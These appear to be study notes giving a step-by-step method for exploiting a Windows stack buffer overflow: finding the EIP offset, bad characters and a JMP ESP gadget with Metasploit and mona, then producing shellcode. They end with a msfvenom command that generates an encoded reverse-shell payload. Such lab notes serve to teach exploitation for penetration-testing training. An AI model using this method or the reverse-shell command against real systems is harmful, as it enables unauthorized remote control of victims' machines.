Trigger the bug

  • Send lots of A’s

  • Expect a crash at 0x41414141

Discover offsets

  • Metasploit’s pattern_create.rb

    • ~/opt/metasploit-framework/tools/exploit/pattern_create.rb -l 1024
  • Locate the EIP register value, find offset

    • /opt/metasploit-framework/tools/exploit/pattern_offset.rb -q (EIP register)
  • Copy the bad_chars bin file to victim box, run mona

  • Find bad characters using the bin

    • !mona cmp -f C:\bad_chars.bin -a 0x014a19f8 (esp location)

Settle on a spot to stick some shellcode

  • Follow the trailing "CC" characters and identify the buffer size

  • Subtract the end ESP from the begging ESP (use hex calculator)

Locate a jump_esp

  • search memory for sequences of bytes (or “Gadgets”) that correspond to a JMP to the address stored in a given register.

  • With the binary in either a running or crashed state, running:

    • !mona jmp -r esp -cpb "\x00\x0A"

  • Causes to search all the memory that contains program code which is not subject to ASLR

  • Usually doesn’t work, so try the following

    • !mona modules

  • This will list modules available, and the protections enabled. Find a dll that doesn’t have Rebase, ASLR, DEP, and SEH. Then search the dll for a JMP_ESP. Opcode for JMP_ESP is FFE4.

    • !mona find -s “\xff\xe4” -m .dll

Create shellcode and prepend some nops

  • Search payloads

    • msfvenom -l payloads

    • msfvenom --payload-options -p windows/shell/reverse_tcp

  • Reverse shell

    • msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"